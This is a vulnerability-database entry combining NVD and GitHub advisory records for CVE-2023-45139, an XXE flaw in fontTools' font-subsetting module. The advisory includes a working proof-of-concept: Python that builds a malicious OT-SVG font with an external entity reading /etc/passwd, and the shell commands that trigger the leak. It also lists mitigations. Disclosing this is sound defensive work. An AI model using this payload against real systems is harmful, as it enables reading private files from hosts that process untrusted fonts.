                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "security-advisories@github.com",
              "type": "Secondary"
            }
          ]
        },
        "published": "2024-01-10T16:15:46.767",
        "references": [
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Patch"
            ],
            "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Release Notes"
            ],
            "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Exploit",
              "Vendor Advisory"
            ],
            "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/"
          }
        ],
        "sourceIdentifier": "security-advisories@github.com",
        "vulnStatus": "Modified",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-611"
              }
            ],
            "source": "security-advisories@github.com",
            "type": "Primary"
          }
        ]
      }
    }
  }
}
  fkie_cve-2023-45139
Vulnerability from fkie_nvd
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | http://www.openwall.com/lists/oss-security/2024/03/08/2 | ||
| security-advisories@github.com | http://www.openwall.com/lists/oss-security/2024/03/09/1 | ||
| security-advisories@github.com | https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c | Patch | |
| security-advisories@github.com | https://github.com/fonttools/fonttools/releases/tag/4.43.0 | Release Notes | |
| security-advisories@github.com | https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5 | Exploit, Vendor Advisory | |
| security-advisories@github.com | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/03/08/2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/03/09/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/fonttools/fonttools/releases/tag/4.43.0 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5 | Exploit, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/ | 
{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:fonttools:fonttools:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "CA51147F-FB56-471F-AA46-967C55F0AE97",
              "versionEndExcluding": "4.43.0",
              "versionStartIncluding": "4.28.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0."
    },
    {
      "lang": "es",
      "value": "fontTools es una librer\u00eda para manipular fuentes, escrita en Python. El m\u00f3dulo subsetting tiene una vulnerabilidad de inyecci\u00f3n de entidades externas XML (XXE) que permite a un atacante resolver entidades arbitrarias cuando se analiza una fuente candidata (fuentes OT-SVG), que contiene una tabla SVG. Esto permite a los atacantes incluir archivos arbitrarios del sistema de archivos en el que se ejecuta fontTools o realizar solicitudes web desde el sistema host. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 4.43.0."
    }
  ],
  "id": "CVE-2023-45139",
  "lastModified": "2024-11-21T08:26:25.513",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-01-10T16:15:46.767",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/08/2"
    },
    {
      "source": "security-advisories@github.com",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/09/1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/08/2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/09/1"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}
  ghsa-6673-4983-2vx5
Vulnerability from github
Summary
As of fonttools>=4.28.2 the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. 
This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.
PoC
The vulnerability can be reproduced following the bellow steps on a unix based system.
- Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised 
/etc/passwdfor our POC file to include and modified an existing subset integration test to build the POC font - see bellow. 
```python
from string import ascii_letters from fontTools.fontBuilder import FontBuilder from fontTools.pens.ttGlyphPen import TTGlyphPen from fontTools.ttLib import newTable
XXE_SVG = """\
]> &test; """
def main(): # generate a random TTF font with an SVG table glyph_order = [".notdef"] + list(ascii_letters) pen = TTGlyphPen(glyphSet=None) pen.moveTo((0, 0)) pen.lineTo((0, 500)) pen.lineTo((500, 500)) pen.lineTo((500, 0)) pen.closePath() glyph = pen.glyph() glyphs = {g: glyph for g in glyph_order}
fb = FontBuilder(unitsPerEm=1024, isTTF=True)
fb.setupGlyphOrder(glyph_order)
fb.setupCharacterMap({ord(c): c for c in ascii_letters})
fb.setupGlyf(glyphs)
fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
fb.setupHorizontalHeader()
fb.setupOS2()
fb.setupPost()
fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})
svg_table = newTable("SVG ")
svg_table.docList = [
   (XXE_SVG, 1, 12)
]
fb.font["SVG "] = svg_table
fb.font.save('poc-payload.ttf')
if name == 'main': main()
```
- Subset the font with an affected version of fontTools - we tested on 
fonttools==4.42.1andfonttools==4.28.2- using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process): 
shell
pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs
- Read the parsed SVG table in the subsetted font:
 
shell
ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx
Observed the included contents of the /etc/passwd file. 
Impact
Note the final severity is dependant on the environment fontTools is running in.
- The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on
 
Possible Mitigations
There may be other ways to mitigate the issue, but some suggestions:
- Set the 
resolve_entities=Falseflag on parsing methods - Consider further methods of disallowing doctype declarations
 - Consider recursive regex matching
 
{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "fonttools"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.28.2"
            },
            {
              "fixed": "4.43.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-45139"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-09T16:01:10Z",
    "nvd_published_at": "2024-01-10T16:15:46Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAs of `fonttools\u003e=4.28.2` the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. \n\nThis allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. \n\n### PoC\n\n\nThe vulnerability can be reproduced following the bellow steps on a unix based system.\n\n1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised `/etc/passwd` for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.\n\n```python\n\nfrom string import ascii_letters\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.pens.ttGlyphPen import TTGlyphPen\nfrom fontTools.ttLib import newTable\n\n\nXXE_SVG = \"\"\"\\\n\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE svg [\u003c!ENTITY test SYSTEM \u0027file:///etc/passwd\u0027\u003e]\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\u003e\n  \u003cg id=\"glyph1\"\u003e\n    \u003ctext font-size=\"10\" x=\"0\" y=\"10\"\u003e\u0026test;\u003c/text\u003e\n  \u003c/g\u003e\n\u003c/svg\u003e\n\"\"\"\n\ndef main():\n    # generate a random TTF font with an SVG table\n    glyph_order = [\".notdef\"] + list(ascii_letters)\n    pen = TTGlyphPen(glyphSet=None)\n    pen.moveTo((0, 0))\n    pen.lineTo((0, 500))\n    pen.lineTo((500, 500))\n    pen.lineTo((500, 0))\n    pen.closePath()\n    glyph = pen.glyph()\n    glyphs = {g: glyph for g in glyph_order}\n\n    fb = FontBuilder(unitsPerEm=1024, isTTF=True)\n    fb.setupGlyphOrder(glyph_order)\n    fb.setupCharacterMap({ord(c): c for c in ascii_letters})\n    fb.setupGlyf(glyphs)\n    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})\n    fb.setupHorizontalHeader()\n    fb.setupOS2()\n    fb.setupPost()\n    fb.setupNameTable({\"familyName\": \"TestSVG\", \"styleName\": \"Regular\"})\n\n    svg_table = newTable(\"SVG \")\n    svg_table.docList = [\n       (XXE_SVG, 1, 12)\n    ]\n    fb.font[\"SVG \"] = svg_table\n\n    fb.font.save(\u0027poc-payload.ttf\u0027)\n\nif __name__ == \u0027__main__\u0027:\n    main()\n\n```\n\n2. Subset the font with an affected version of fontTools - we tested on `fonttools==4.42.1` and `fonttools==4.28.2` - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):\n\n```shell\npyftsubset poc-payload.ttf --output-file=\"poc-payload.subset.ttf\" --unicodes=\"*\" --ignore-missing-glyphs\n```\n\n3. Read the parsed SVG table in the subsetted font:\n\n```shell\nttx -t SVG poc-payload.subset.ttf \u0026\u0026 cat poc-payload.subset.ttx\n```\n\nObserved the included contents of the `/etc/passwd` file. \n\n### Impact\n\nNote the final severity is dependant on the environment fontTools is running in.\n\n- The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on\n\n\n\n### Possible Mitigations \n\nThere may be other ways to mitigate the issue, but some suggestions:\n\n1. Set the `resolve_entities=False` flag on parsing methods\n2. Consider further methods of disallowing doctype declarations\n3. Consider recursive regex matching\n\n",
  "id": "GHSA-6673-4983-2vx5",
  "modified": "2024-05-02T13:09:24Z",
  "published": "2024-01-09T16:01:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45139"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fonttools/fonttools"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/08/2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/09/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fonttools XML External Entity Injection (XXE) Vulnerability"
}
  Sightings
| Author | Source | Type | Date | 
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
 - Confirmed: The vulnerability is confirmed from an analyst perspective.
 - Published Proof of Concept: A public proof of concept is available for this vulnerability.
 - Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
 - Patched: This vulnerability was successfully patched by the user reporting the sighting.
 - Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
 - Not confirmed: The user expresses doubt about the veracity of the vulnerability.
 - Not patched: This vulnerability was not successfully patched by the user reporting the sighting.